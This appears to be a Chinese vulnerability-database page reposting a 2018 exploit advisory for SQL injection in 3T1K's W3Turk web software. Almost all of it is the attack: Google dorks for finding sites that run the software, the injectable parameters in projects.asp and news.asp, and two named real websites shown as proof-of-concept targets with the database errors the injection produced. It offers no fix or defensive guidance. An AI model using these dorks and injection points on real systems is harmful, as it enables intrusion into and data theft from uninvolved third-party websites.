3T1K Design and Coding İnternet Services W3Turk SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1034842 漏洞类型
发布时间 2018-06-02 更新时间 2018-06-02
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018060018
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#################################################################################################

# Exploit Title : 3T1K Design and Coding İnternet Services W3Turk SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos 
# Date : 02/06/2018
# Vendor Homepage : 3t1k.com / w3turk.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89

#################################################################################################

# Google Dork 1 : inurl:''/?ref=3t1k''

# Google Dork 2 : intext:''tasarım ve kodlama : 3t1k.com''

# Google Dork 3 : intext:''3T1K İnternet Hizmetleri''

# Exploit : /projects.asp?l=0&p=[SQL Injection]

# Exploit : /news.asp?path=[SQL Injection]

#################################################################################################

# Example Site =>  zeminteknolojileri.com/tr/projects.asp?l=0&p=85%27 => [ Proof of Concept ] => archive.is/35WG6

# Error => Microsoft VBScript runtime error '800a000d' - Type mismatch: '[string: "85'"]' - /tr/pages/gettopic.asp, line 15

# Example Site =>   adsyb.org.tr/news.asp?path=694C5951' => [ Proof of Concept ] => http://archive.is/nazXW

# Error => Microsoft VBScript runtime error '800a000d' - Type mismatch: 'Clng' - /cgi-bin/security.asp, line 81

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################